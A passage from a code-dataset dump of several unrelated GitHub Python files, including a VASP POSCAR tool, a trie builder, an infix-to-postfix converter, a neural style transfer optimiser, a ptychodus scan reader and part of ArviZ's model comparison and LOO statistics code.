    print('new POSCAR written to: '+str(ofile))\r\n\r\n
if __name__ == '__main__':\r\n
    ifile='./POSCAR'\r\n
    ofile='./POSCAR_seldyn'\r\n
    short_opts='hi:o:'\r\n
    long_opts=['help','input=','output=']\r\n
    try:\r\n
        opts,args=getopt(sys.argv[1:],short_opts,long_opts)\r\n
    except GetoptError:\r\n
        print('error in command line syntax')\r\n
        sys.exit(2)\r\n
    for i,j in opts:\r\n
        if i in ['-h','--help']:\r\n
            print('''\r\n
Note: for options with multiple values, separate the values with commas\r\n    \r\n
these options take a value:\r\n
    -i, --input          specify an input other than ./POSCAR\r\n
    -o, --output         specify an output other than ./POSCAR_seldyn\r\n
help options:\r\n
    -h, --help           display this help message\r\n
''')\r\n
            sys.exit()\r\n
        if i in ['-i','--input']:\r\n
            ifile=j\r\n
        if i in ['-o','--output']:\r\n
            ofile=j\r\n
    try:\r\n
        remove_seldyn(ifile,ofile)\r\n
    except FileNotFoundError:\r\n
        print('error reading input. exiting...')\r\n
        sys.exit(1)","repo_name":"benwmcdowell/VASP_POSCAR_methods","sub_path":"remove_seldyn.py","file_name":"remove_seldyn.py","file_ext":"py","file_size_in_byte":3798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"}
 +{"seq_id":"16774687069","text":"import argparse\n\n
from util.prepare_data import prepare_train_data\n
from service.train_service import train_classifier\n\n\n
def main():\n
    # Pass the model name and number of epochs as arguments\n
    parser = argparse.ArgumentParser(description='Train a face recognition model')\n
    parser.add_argument('--dataset', type=str, default='data/dataset', help='Path to the dataset')\n
    parser.add_argument('--model', type=int, help='Model to train', required=True)\n
    parser.add_argument('--epochs', type=int, default=20, help='Number of epochs to train for')\n
    parser.add_argument('--patience', type=int, default=10, help='Number of epochs to wait for improvement')\n\n
    inpout = parser.parse_args()\n
    args = prepare_train_data(inpout.model, inpout.dataset)\n\n
    train_classifier(args, inpout.epochs, inpout.patience)\n\n\n
if __name__ == '__main__':\n
    main()\n
","repo_name":"vvitzilaios/faceRecognition","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
 +{"seq_id":"29566678011","text":"# This is a sample Python script.\n
import sys\n
# Press ⌃R to execute it or replace it with your code.\n
# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.\n\n\n
def TrieConstruction(Patterns):\n
    count = 0\n
    root = TrieNode(\"\", count)\n
    count += 1\n
    for pattern in Patterns:\n
        currentNode = root\n
        for c in pattern:\n
            if c not in currentNode.children.keys():\n
                currentNode.children[c] = 
TrieNode(c,count)\n count += 1\n currentNode = currentNode.children.get(c)\n currentNode.is_end = True\n return root\n\n\n#class from github\nclass TrieNode:\n \"\"\"A node in the trie structure\"\"\"\n\n def __init__(self, char, count):\n # the character stored in this node\n self.char = char\n\n # whether this can be the end of a word\n self.is_end = False\n\n # a counter indicating how many nodes have been inserted\n self.counter = count\n\n # a dictionary of child nodes\n # keys are characters, values are nodes\n self.children = {}\n\n def print(self, prev):\n\n print(str(prev) + \" \" + str(self.counter) + \" \" + self.char)\n for n in self.children.values():\n n.print(self.counter)\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n filePath = input()\n inFile = open(filePath)\n patterns = []\n for line in inFile:\n patterns.extend(line.split())\n inFile.close()\n trie = TrieConstruction(patterns)\n f = open(\"output.txt\", 'w')\n sys.stdout = f\n for node in trie.children.values():\n node.print(0)\n f.close()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n","repo_name":"alexkubicek/TrieConstruction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21348806023","text":"from stack import Stack\nimport operator\n\ndef infix_to_postfix(lst):\n\texpression = ''\n\tprecedense = {'+':1, '-':1, '*':2, '/':2}\n\tstack = Stack()\n\tfor item in lst:\n\t\tif item in precedense:\n\t\t\twhile (stack.top() == 'empty') or (stack.top() in ['(', '{', '[']) or (precedense[stack.top()] >= precedense[item]):\n\t\t\t\tif stack.top() in ['(', '{', '[']:\n\t\t\t\t\tbreak\n\t\t\t\tk = stack.pop()\n\t\t\t\tif k == 'empty':\n\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\texpression = expression+k\n\t\t\tstack.push(item)\n\t\telif (item in [')', '}', ']']):\n\t\t\twhile stack.top() not in ['(', '{', '[']:\n\t\t\t\texpression = expression+stack.pop()\n\t\t\telse:\n\t\t\t\tstack.pop()\n\t\telif item in ['(', '{', '[']:\n\t\t\tstack.push(item)\n\t\t\t\n\t\telse:\n\t\t\texpression = expression+item\n\t\t\t\n\twhile stack.top() != 'empty':\n\t\texpression=expression+stack.pop()\n\t\t\n\treturn expression\n\t\ndef postfix_evaluation(lst):\n\tstack = Stack()\n\tprecedense = {'+':operator.add, '-':operator.sub, '*':operator.mul, '/':operator.truediv}\n\tfor item in lst:\n\t\tif item in precedense:\n\t\t\ti = stack.pop()\n\t\t\tj = stack.pop()\n\t\t\tstack.push(precedense[item](int(j),int(i)))\n\t\telse:\n\t\t\tstack.push(item)\n\t\t\t\n\treturn stack.pop()\n\n\t\t\t\n\n\t\t\t\n\t\t\t\n\t\t \n\t\t\n","repo_name":"0snowden0/Codes","sub_path":"DSA/expression_evaluation_and_conversion.py","file_name":"expression_evaluation_and_conversion.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18014927795","text":"from PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore\n\n\n# Shows information about project and developer\nclass About(QDialog):\n\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"About\")\n\n self.layout = QVBoxLayout()\n\n # Project name\n self._git = QLabel(\"2019 Frevo\")\n self._git.setOpenExternalLinks(True)\n self._git.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._git)\n\n # Developer\n self._developer = QLabel(\"by Mat Muller\")\n self._developer.setOpenExternalLinks(True)\n 
self._developer.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._developer)\n\n # Version\n self._developer = QLabel(\"v1.0.1\")\n self._developer.setOpenExternalLinks(True)\n self._developer.setAlignment(QtCore.Qt.AlignCenter)\n self.layout.addWidget(self._developer)\n\n self.setLayout(self.layout)\n\n self.exec_()\n self.activateWindow()\n","repo_name":"matuzalemmuller/Frevo","sub_path":"frevo/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"41549656915","text":"from loss import *\nfrom model import *\nfrom utils import *\n\nTensor = torch.tensor\n\n\nclass Optimizing:\n def __init__(self, device, alpha=-2, beta=9, iterations=500, lr=1):\n self.STYLE_WEIGHT = beta * np.array([1.50, 0.80, 0.25, 0.25, 0.25]) # what if make this vary? the later, the haigher for the deeper\n self.CONTENT_WEIGHT = alpha * np.array([1])\n self.LEARNING_RATE = lr\n self.CONTENT_PATH = 'images/content.jpg'\n self.STYLE_PATH = 'images/style.jpg'\n self.RESULT_PATH = 'result.jpg'\n self.MAX_ITERATIONS = iterations\n self.SHOW_ITERATIONS = 50\n self.DEVICE = device\n\n def load_images(self, from_content=True):\n content_image = load_img(self.CONTENT_PATH).to(self.DEVICE)\n style_image = load_img(self.STYLE_PATH).to(self.DEVICE)\n if from_content:\n result_image = content_image.clone()\n result_image.requires_grad = True\n\n return content_image, style_image, result_image\n\n def save_result(self):\n show_img(self.result_image).save(self.RESULT_PATH)\n\n def style_transfer(self):\n model = NSTModel()\n model.to(self.DEVICE)\n content_image, style_image, result_image = self.load_images()\n optim = torch.optim.LBFGS([result_image], lr=self.LEARNING_RATE)\n\n style_targets = [GramMatrix()(A).detach() for A in model(style_image)[0]]\n content_targets = [A.detach() for A in model(content_image)[1]]\n\n n_iterations = [0] # avoid error due to locality\n while n_iterations[0] <= self.MAX_ITERATIONS:\n def closure():\n optim.zero_grad()\n style_outputs, content_outputs = model(result_image)\n content_loss = [self.CONTENT_WEIGHT[i] * ContentLoss()(Y, content_targets[i]) for i, Y in enumerate(content_outputs)]\n style_loss = [self.STYLE_WEIGHT[i] * GramMSELoss()(Y, style_targets[i]) for i, Y in enumerate(style_outputs)]\n\n loss = sum(content_loss + style_loss)\n loss.backward()\n\n n_iterations[0] += 1\n if n_iterations[0] % self.SHOW_ITERATIONS == (self.SHOW_ITERATIONS - 1):\n print('Iteration: %d, Style Loss: %.4f, Content Loss: %.4f' % (n_iterations[0], sum(style_loss).item(), sum(content_loss).item()))\n return loss\n\n optim.step(closure)\n self.result_image = result_image\n return result_image\n","repo_name":"yuchen-xiyue/NSTExperiment","sub_path":"nst_/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19373756910","text":"from pathlib import Path\nimport logging\n\nimport h5py\n\nfrom ptychodus.api.plugins import PluginRegistry\nfrom ptychodus.api.scan import Scan, ScanFileReader, ScanPoint, ScanPointParseError, TabularScan\n\nlogger = logging.getLogger(__name__)\n\n\nclass PtychoShelvesScanFileReader(ScanFileReader):\n\n def read(self, filePath: Path) -> Scan:\n pointList = list()\n\n try:\n with h5py.File(filePath, 'r') as h5File:\n try:\n ppX = h5File['/ppX']\n ppY = h5File['/ppY']\n except KeyError:\n logger.debug('Unable to 
find data.')\n else:\n if ppX.shape == ppY.shape:\n logger.debug(f'Coordinate arrays have shape {ppX.shape}.')\n else:\n raise ScanPointParseError('Coordinate array shape mismatch!')\n\n for x, y in zip(ppX, ppY):\n point = ScanPoint(x, y)\n pointList.append(point)\n except OSError:\n logger.debug(f'Unable to read file \\\"{filePath}\\\".')\n\n return TabularScan.createFromPointIterable(pointList)\n\n\ndef registerPlugins(registry: PluginRegistry) -> None:\n registry.scanFileReaders.registerPlugin(\n PtychoShelvesScanFileReader(),\n simpleName='PtychoShelves',\n displayName='PtychoShelves Scan Position Files (*.h5 *.hdf5)')\n","repo_name":"AdvancedPhotonSource/ptychodus","sub_path":"ptychodus/plugins/ptychoShelvesScanFile.py","file_name":"ptychoShelvesScanFile.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"70310240374","text":"# pylint: disable=too-many-lines\n\"\"\"Generic and miscellanea statistical functions in ArviZ.\"\"\"\n\nimport itertools\nimport logging\nimport warnings\nfrom copy import deepcopy\nfrom typing import Callable, List, Mapping, Optional, Tuple, Union, cast\n\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as st\nimport xarray as xr\nfrom datatree import DataTree\nfrom scipy.optimize import minimize\nfrom typing_extensions import Literal\nfrom xarray_einstats import stats\n\nNO_GET_ARGS: bool = False\ntry:\n from typing_extensions import get_args\nexcept ImportError:\n NO_GET_ARGS = True\n\nfrom arviz_base import convert_to_dataset, convert_to_datatree, extract, rcParams, xarray_var_iter\nfrom arviz_base.labels import BaseLabeller\nfrom arviz_base.rcparams import ICKeyword, ScaleKeyword\nfrom arviz_base.utils import _get_coords, _var_names\n\nfrom ..utils import ELPDData\nfrom ..utils import get_log_likelihood as _get_log_likelihood\nfrom .diagnostics import _mc_error, _multichain_statistics, ess\nfrom .intervals import hdi\nfrom .stats_utils import logsumexp as _logsumexp\nfrom .stats_utils import make_ufunc as _make_ufunc\nfrom .stats_utils import smooth_data\nfrom .stats_utils import wrap_xarray_ufunc as _wrap_xarray_ufunc\n\n_log = logging.getLogger(__name__)\n\n\n__all__ = [\n \"compare\",\n \"loo\",\n \"loo_pit\",\n \"psislw\",\n \"r2_samples\",\n \"r2_score\",\n \"summary\",\n \"waic\",\n \"weight_predictions\",\n \"_calculate_ics\",\n]\n\n\ndef compare(\n compare_dict: Mapping[str, DataTree],\n ic: Optional[ICKeyword] = None,\n method: Literal[\"stacking\", \"BB-pseudo-BMA\", \"pseudo-BMA\"] = \"stacking\",\n b_samples: int = 1000,\n alpha: float = 1,\n seed=None,\n scale: Optional[ScaleKeyword] = None,\n var_name: Optional[str] = None,\n):\n r\"\"\"Compare models based on their expected log pointwise predictive density (ELPD).\n\n The ELPD is estimated either by Pareto smoothed importance sampling leave-one-out\n cross-validation (LOO) or using the widely applicable information criterion (WAIC).\n We recommend loo. Read more theory here - in a paper by some of the\n leading authorities on model comparison dx.doi.org/10.1111/1467-9868.00353\n\n Parameters\n ----------\n compare_dict: dict of {str: InferenceData or ELPDData}\n A dictionary of model names and :class:`arviz.InferenceData` or ``ELPDData``.\n ic: str, optional\n Method to estimate the ELPD, available options are \"loo\" or \"waic\". Defaults to\n ``rcParams[\"stats.information_criterion\"]``.\n method: str, optional\n Method used to estimate the weights for each model. 
Available options are:\n\n - 'stacking' : stacking of predictive distributions.\n - 'BB-pseudo-BMA' : pseudo-Bayesian Model averaging using Akaike-type\n weighting. The weights are stabilized using the Bayesian bootstrap.\n - 'pseudo-BMA': pseudo-Bayesian Model averaging using Akaike-type\n weighting, without Bootstrap stabilization (not recommended).\n\n For more information read https://arxiv.org/abs/1704.02030\n b_samples: int, optional default = 1000\n Number of samples taken by the Bayesian bootstrap estimation.\n Only useful when method = 'BB-pseudo-BMA'.\n Defaults to ``rcParams[\"stats.ic_compare_method\"]``.\n alpha: float, optional\n The shape parameter in the Dirichlet distribution used for the Bayesian bootstrap. Only\n useful when method = 'BB-pseudo-BMA'. When alpha=1 (default), the distribution is uniform\n on the simplex. A smaller alpha will keeps the final weights more away from 0 and 1.\n seed: int or np.random.RandomState instance, optional\n If int or RandomState, use it for seeding Bayesian bootstrap. Only\n useful when method = 'BB-pseudo-BMA'. Default None the global\n :mod:`numpy.random` state is used.\n scale: str, optional\n Output scale for IC. Available options are:\n\n - `log` : (default) log-score (after Vehtari et al. (2017))\n - `negative_log` : -1 * (log-score)\n - `deviance` : -2 * (log-score)\n\n A higher log-score (or a lower deviance) indicates a model with better predictive\n accuracy.\n var_name: str, optional\n If there is more than a single observed variable in the ``InferenceData``, which\n should be used as the basis for comparison.\n\n Returns\n -------\n A DataFrame, ordered from best to worst model (measured by the ELPD).\n The index reflects the key with which the models are passed to this function. The columns are:\n rank: The rank-order of the models. 0 is the best.\n elpd: ELPD estimated either using (PSIS-LOO-CV `elpd_loo` or WAIC `elpd_waic`).\n Higher ELPD indicates higher out-of-sample predictive fit (\"better\" model).\n If `scale` is `deviance` or `negative_log` smaller values indicates\n higher out-of-sample predictive fit (\"better\" model).\n pIC: Estimated effective number of parameters.\n elpd_diff: The difference in ELPD between two models.\n If more than two models are compared, the difference is computed relative to the\n top-ranked model, that always has a elpd_diff of 0.\n weight: Relative weight for each model.\n This can be loosely interpreted as the probability of each model (among the compared model)\n given the data. By default the uncertainty in the weights estimation is considered using\n Bayesian bootstrap.\n SE: Standard error of the ELPD estimate.\n If method = BB-pseudo-BMA these values are estimated using Bayesian bootstrap.\n dSE: Standard error of the difference in ELPD between each model and the top-ranked model.\n It's always 0 for the top-ranked model.\n warning: A value of 1 indicates that the computation of the ELPD may not be reliable.\n This could be indication of WAIC/LOO starting to fail see\n http://arxiv.org/abs/1507.04544 for details.\n scale: Scale used for the ELPD.\n\n Examples\n --------\n Compare the centered and non centered models of the eight school problem:\n\n .. 
ipython::\n\n In [1]: import arviz as az\n ...: data1 = az.load_arviz_data(\"non_centered_eight\")\n ...: data2 = az.load_arviz_data(\"centered_eight\")\n ...: compare_dict = {\"non centered\": data1, \"centered\": data2}\n ...: az.compare(compare_dict)\n\n Compare the models using PSIS-LOO-CV, returning the ELPD in log scale and calculating the\n weights using the stacking method.\n\n .. ipython::\n\n In [1]: az.compare(compare_dict, ic=\"loo\", method=\"stacking\", scale=\"log\")\n\n See Also\n --------\n loo :\n Compute the ELPD using the Pareto smoothed importance sampling Leave-one-out\n cross-validation method.\n waic : Compute the ELPD using the widely applicable information criterion.\n plot_compare : Summary plot for model comparison.\n\n References\n ----------\n .. [1] Vehtari, A., Gelman, A. & Gabry, J. Practical Bayesian model evaluation using\n leave-one-out cross-validation and WAIC. Stat Comput 27, 1413–1432 (2017)\n see https://doi.org/10.1007/s11222-016-9696-4\n\n \"\"\"\n try:\n (ics_dict, scale, ic) = _calculate_ics(compare_dict, scale=scale, ic=ic, var_name=var_name)\n except Exception as err:\n raise err.__class__(\"Encountered error in ELPD computation of compare.\") from err\n names = list(ics_dict.keys())\n if ic == \"loo\":\n df_comp = pd.DataFrame(\n index=names,\n columns=[\n \"rank\",\n \"elpd_loo\",\n \"p_loo\",\n \"elpd_diff\",\n \"weight\",\n \"se\",\n \"dse\",\n \"warning\",\n \"scale\",\n ],\n dtype=np.float_,\n )\n elif ic == \"waic\":\n df_comp = pd.DataFrame(\n index=names,\n columns=[\n \"rank\",\n \"elpd_waic\",\n \"p_waic\",\n \"elpd_diff\",\n \"weight\",\n \"se\",\n \"dse\",\n \"warning\",\n \"scale\",\n ],\n dtype=np.float_,\n )\n else:\n raise NotImplementedError(f\"The information criterion {ic} is not supported.\")\n\n if scale == \"log\":\n scale_value = 1\n ascending = False\n else:\n if scale == \"negative_log\":\n scale_value = -1\n else:\n scale_value = -2\n ascending = True\n\n method = rcParams[\"stats.ic_compare_method\"] if method is None else method\n if method.lower() not in [\"stacking\", \"bb-pseudo-bma\", \"pseudo-bma\"]:\n raise ValueError(f\"The method {method}, to compute weights, is not supported.\")\n\n ic_i = f\"{ic}_i\"\n\n ics = pd.DataFrame.from_dict(\n {\n name: {\n f\"elpd_{ic}\": elpd_data.elpd,\n ic_i: elpd_data.elpd_i.values.flatten(),\n \"se\": elpd_data.se,\n }\n for name, elpd_data in ics_dict.items()\n },\n orient=\"index\",\n )\n ics.sort_values(by=f\"elpd_{ic}\", inplace=True, ascending=ascending)\n\n if method.lower() == \"stacking\":\n rows, cols, ic_i_val = _ic_matrix(ics, ic_i)\n exp_ic_i = np.exp(ic_i_val / scale_value)\n km1 = cols - 1\n\n def w_fuller(weights):\n return np.concatenate((weights, [max(1.0 - np.sum(weights), 0.0)]))\n\n def log_score(weights):\n w_full = w_fuller(weights)\n score = 0.0\n for i in range(rows):\n score += np.log(np.dot(exp_ic_i[i], w_full))\n return -score\n\n def gradient(weights):\n w_full = w_fuller(weights)\n grad = np.zeros(km1)\n for k, i in itertools.product(range(km1), range(rows)):\n grad[k] += (exp_ic_i[i, k] - exp_ic_i[i, km1]) / np.dot(exp_ic_i[i], w_full)\n return -grad\n\n theta = np.full(km1, 1.0 / cols)\n bounds = [(0.0, 1.0) for _ in range(km1)]\n constraints = [\n {\"type\": \"ineq\", \"fun\": lambda x: -np.sum(x) + 1.0},\n {\"type\": \"ineq\", \"fun\": np.sum},\n ]\n\n weights = minimize(\n fun=log_score, x0=theta, jac=gradient, bounds=bounds, constraints=constraints\n )\n\n weights = w_fuller(weights[\"x\"])\n ses = ics[\"se\"]\n\n elif method.lower() == 
\"bb-pseudo-bma\":\n rows, cols, ic_i_val = _ic_matrix(ics, ic_i)\n ic_i_val = ic_i_val * rows\n\n b_weighting = st.dirichlet.rvs(alpha=[alpha] * rows, size=b_samples, random_state=seed)\n weights = np.zeros((b_samples, cols))\n z_bs = np.zeros_like(weights)\n for i in range(b_samples):\n z_b = np.dot(b_weighting[i], ic_i_val)\n u_weights = np.exp((z_b - np.max(z_b)) / scale_value)\n z_bs[i] = z_b # pylint: disable=unsupported-assignment-operation\n weights[i] = u_weights / np.sum(u_weights)\n\n weights = weights.mean(axis=0)\n ses = pd.Series(z_bs.std(axis=0), index=names) # pylint: disable=no-member\n\n elif method.lower() == \"pseudo-bma\":\n min_ic = ics.iloc[0][f\"elpd_{ic}\"]\n z_rv = np.exp((ics[f\"elpd_{ic}\"] - min_ic) / scale_value)\n weights = z_rv / np.sum(z_rv)\n ses = ics[\"se\"]\n\n if np.any(weights):\n min_ic_i_val = ics[ic_i].iloc[0]\n for idx, val in enumerate(ics.index):\n res = ics.loc[val]\n if scale_value < 0:\n diff = res[ic_i] - min_ic_i_val\n else:\n diff = min_ic_i_val - res[ic_i]\n d_ic = np.sum(diff)\n d_std_err = np.sqrt(len(diff) * np.var(diff))\n std_err = ses.loc[val]\n weight = weights[idx]\n df_comp.loc[val] = (\n idx,\n res[f\"elpd_{ic}\"],\n ics_dict[val].p,\n d_ic,\n weight,\n std_err,\n d_std_err,\n ics_dict[val].warning,\n ics_dict[val].scale,\n )\n\n df_comp[\"rank\"] = df_comp[\"rank\"].astype(int)\n df_comp[\"warning\"] = df_comp[\"warning\"].astype(bool)\n return df_comp.sort_values(by=f\"elpd_{ic}\", ascending=ascending)\n\n\ndef _ic_matrix(ics, ic_i):\n \"\"\"Store the previously computed pointwise predictive accuracy values (ics) in a 2D matrix.\"\"\"\n cols, _ = ics.shape\n rows = len(ics[ic_i].iloc[0])\n ic_i_val = np.empty((rows, cols))\n\n for idx, val in enumerate(ics.index):\n ic = ics.loc[val][ic_i]\n\n if len(ic) != rows:\n raise ValueError(\"The number of observations should be the same across all models\")\n\n ic_i_val[:, idx] = ic\n\n return rows, cols, ic_i_val\n\n\ndef _calculate_ics(\n compare_dict,\n scale: Optional[ScaleKeyword] = None,\n ic: Optional[ICKeyword] = None,\n var_name: Optional[str] = None,\n):\n \"\"\"Calculate LOO or WAIC only if necessary.\n\n It always calls the ic function with ``pointwise=True``.\n\n Parameters\n ----------\n compare_dict : dict of {str : InferenceData or ELPDData}\n A dictionary of model names and InferenceData or ELPDData objects\n scale : str, optional\n Output scale for IC. Available options are:\n\n - `log` : (default) log-score (after Vehtari et al. 
(2017))\n - `negative_log` : -1 * (log-score)\n - `deviance` : -2 * (log-score)\n\n A higher log-score (or a lower deviance) indicates a model with better predictive accuracy.\n ic : str, optional\n Information Criterion (PSIS-LOO `loo` or WAIC `waic`) used to compare models.\n Defaults to ``rcParams[\"stats.information_criterion\"]``.\n var_name : str, optional\n Name of the variable storing pointwise log likelihood values in ``log_likelihood`` group.\n\n\n Returns\n -------\n compare_dict : dict of ELPDData\n scale : str\n ic : str\n\n \"\"\"\n precomputed_elpds = {\n name: elpd_data\n for name, elpd_data in compare_dict.items()\n if isinstance(elpd_data, ELPDData)\n }\n precomputed_ic = None\n precomputed_scale = None\n if precomputed_elpds:\n _, arbitrary_elpd = precomputed_elpds.popitem()\n precomputed_ic = arbitrary_elpd.kind\n precomputed_scale = arbitrary_elpd.scale\n raise_non_pointwise = arbitrary_elpd.elpd_i is None\n if any(elpd_data.kind != precomputed_ic for elpd_data in precomputed_elpds.values()):\n raise ValueError(\n \"All information criteria to be compared must be the same \"\n \"but found both loo and waic.\"\n )\n if any(elpd_data.scale != precomputed_scale for elpd_data in precomputed_elpds.values()):\n raise ValueError(\"All information criteria to be compared must use the same scale\")\n if (\n any(elpd_data.elpd_i is None for elpd_data in precomputed_elpds.values())\n or raise_non_pointwise\n ):\n raise ValueError(\"Not all provided ELPDData have been calculated with pointwise=True\")\n if ic is not None and ic.lower() != precomputed_ic:\n warnings.warn(\n \"Provided ic argument is incompatible with precomputed elpd data. \"\n f\"Using ic from precomputed ELPDData: {precomputed_ic}\"\n )\n ic = precomputed_ic\n if scale is not None and scale.lower() != precomputed_scale:\n warnings.warn(\n \"Provided scale argument is incompatible with precomputed elpd data. 
\"\n f\"Using scale from precomputed ELPDData: {precomputed_scale}\"\n )\n scale = precomputed_scale\n\n if ic is None and precomputed_ic is None:\n ic = cast(ICKeyword, rcParams[\"stats.information_criterion\"])\n elif ic is None:\n ic = precomputed_ic\n else:\n ic = cast(ICKeyword, ic.lower())\n allowable = [\"loo\", \"waic\"] if NO_GET_ARGS else get_args(ICKeyword)\n if ic not in allowable:\n raise ValueError(f\"{ic} is not a valid value for ic: must be in {allowable}\")\n\n if scale is None and precomputed_scale is None:\n scale = cast(ScaleKeyword, rcParams[\"stats.ic_scale\"])\n elif scale is None:\n scale = precomputed_scale\n else:\n scale = cast(ScaleKeyword, scale.lower())\n allowable = [\"log\", \"negative_log\", \"deviance\"] if NO_GET_ARGS else get_args(ScaleKeyword)\n if scale not in allowable:\n raise ValueError(f\"{scale} is not a valid value for scale: must be in {allowable}\")\n\n if ic == \"loo\":\n ic_func: Callable = loo\n elif ic == \"waic\":\n ic_func = waic\n else:\n raise NotImplementedError(f\"The information criterion {ic} is not supported.\")\n\n compare_dict = deepcopy(compare_dict)\n for name, dataset in compare_dict.items():\n if not isinstance(dataset, ELPDData):\n try:\n compare_dict[name] = ic_func(\n convert_to_datatree(dataset),\n pointwise=True,\n scale=scale,\n var_name=var_name,\n )\n except Exception as err:\n raise err.__class__(\n f\"Encountered error trying to compute {ic} from model {name}.\"\n ) from err\n return (compare_dict, scale, ic)\n\n\ndef loo(data, pointwise=None, var_name=None, reff=None, scale=None):\n \"\"\"Compute Pareto-smoothed importance sampling leave-one-out cross-validation (PSIS-LOO-CV).\n\n Estimates the expected log pointwise predictive density (elpd) using Pareto-smoothed\n importance sampling leave-one-out cross-validation (PSIS-LOO-CV). Also calculates LOO's\n standard error and the effective number of parameters. Read more theory here\n https://arxiv.org/abs/1507.04544 and here https://arxiv.org/abs/1507.02646\n\n Parameters\n ----------\n data: obj\n Any object that can be converted to an :class:`arviz.InferenceData` object.\n Refer to documentation of\n :func:`arviz.convert_to_dataset` for details.\n pointwise: bool, optional\n If True the pointwise predictive accuracy will be returned. Defaults to\n ``stats.ic_pointwise`` rcParam.\n var_name : str, optional\n The name of the variable in log_likelihood groups storing the pointwise log\n likelihood data to use for loo computation.\n reff: float, optional\n Relative MCMC efficiency, ``ess / n`` i.e. number of effective samples divided by the number\n of actual samples. Computed from trace by default.\n scale: str\n Output scale for loo. 
Available options are:\n\n - ``log`` : (default) log-score\n - ``negative_log`` : -1 * log-score\n - ``deviance`` : -2 * log-score\n\n A higher log-score (or a lower deviance or negative log_score) indicates a model with\n better predictive accuracy.\n\n Returns\n -------\n ELPDData object (inherits from :class:`pandas.Series`) with the following row/attributes:\n elpd: approximated expected log pointwise predictive density (elpd)\n se: standard error of the elpd\n p_loo: effective number of parameters\n shape_warn: bool\n True if the estimated shape parameter of\n Pareto distribution is greater than 0.7 for one or more samples\n loo_i: array of pointwise predictive accuracy, only if pointwise True\n pareto_k: array of Pareto shape values, only if pointwise True\n scale: scale of the elpd\n\n The returned object has a custom print method that overrides pd.Series method.\n\n See Also\n --------\n compare : Compare models based on PSIS-LOO loo or WAIC waic cross-validation.\n waic : Compute the widely applicable information criterion.\n plot_compare : Summary plot for model comparison.\n plot_elpd : Plot pointwise elpd differences between two or more models.\n plot_khat : Plot Pareto tail indices for diagnosing convergence.\n\n Examples\n --------\n Calculate LOO of a model:\n\n .. ipython::\n\n In [1]: import arviz as az\n ...: data = az.load_arviz_data(\"centered_eight\")\n ...: az.loo(data)\n\n Calculate LOO of a model and return the pointwise values:\n\n .. ipython::\n\n In [2]: data_loo = az.loo(data, pointwise=True)\n ...: data_loo.loo_i\n \"\"\"\n inference_data = convert_to_datatree(data)\n log_likelihood = _get_log_likelihood(inference_data, var_name=var_name)\n pointwise = rcParams[\"stats.ic_pointwise\"] if pointwise is None else pointwise\n\n log_likelihood = log_likelihood.stack(__sample__=(\"chain\", \"draw\"))\n shape = log_likelihood.shape\n n_samples = shape[-1]\n n_data_points = np.prod(shape[:-1])\n scale = rcParams[\"stats.ic_scale\"] if scale is None else scale.lower()\n\n if scale == \"deviance\":\n scale_value = -2\n elif scale == \"log\":\n scale_value = 1\n elif scale == \"negative_log\":\n scale_value = -1\n else:\n raise TypeError('Valid scale values are \"deviance\", \"log\", \"negative_log\"')\n\n if reff is None:\n if not hasattr(inference_data, \"posterior\"):\n raise TypeError(\"Must be able to extract a posterior group from data.\")\n posterior = inference_data.posterior\n n_chains = len(posterior.chain)\n if n_chains == 1:\n reff = 1.0\n else:\n ess_p = ess(posterior, method=\"mean\")\n # this mean is over all data variables\n reff = (\n np.hstack([ess_p[v].values.flatten() for v in ess_p.data_vars]).mean() / n_samples\n )\n\n log_weights, pareto_shape = psislw(-log_likelihood, reff)\n log_weights += log_likelihood\n\n warn_mg = False\n if np.any(pareto_shape > 0.7):\n warnings.warn(\n \"Estimated shape parameter of Pareto distribution is greater than 0.7 for \"\n \"one or more samples. You should consider using a more robust model, this is because \"\n \"importance sampling is less likely to work well if the marginal posterior and \"\n \"LOO posterior are very different. 
This is more likely to happen with a non-robust \"\n \"model and highly influential observations.\"\n )\n warn_mg = True\n\n ufunc_kwargs = {\"n_dims\": 1, \"ravel\": False}\n kwargs = {\"input_core_dims\": [[\"__sample__\"]]}\n loo_lppd_i = scale_value * _wrap_xarray_ufunc(\n _logsumexp, log_weights, ufunc_kwargs=ufunc_kwargs, **kwargs\n )\n loo_lppd = loo_lppd_i.values.sum()\n loo_lppd_se = (n_data_points * np.var(loo_lppd_i.values)) ** 0.5\n\n lppd = np.sum(\n _wrap_xarray_ufunc(\n _logsumexp,\n log_likelihood,\n func_kwargs={\"b_inv\": n_samples},\n ufunc_kwargs=ufunc_kwargs,\n **kwargs,\n ).values\n )\n p_loo = lppd - loo_lppd / scale_value\n\n if not pointwise:\n return ELPDData(\n kind=\"loo\",\n elpd=loo_lppd,\n se=loo_lppd_se,\n p=p_loo,\n n_samples=n_samples,\n n_data_points=n_data_points,\n scale=scale,\n warning=warn_mg,\n )\n if np.equal(loo_lppd, loo_lppd_i).all(): # pylint: disable=no-member\n warnings.warn(\n \"The point-wise LOO is the same with the sum LOO, please double check \"\n \"the Observed RV in your model to make sure it returns element-wise logp.\"\n )\n return ELPDData(\n kind=\"loo\",\n 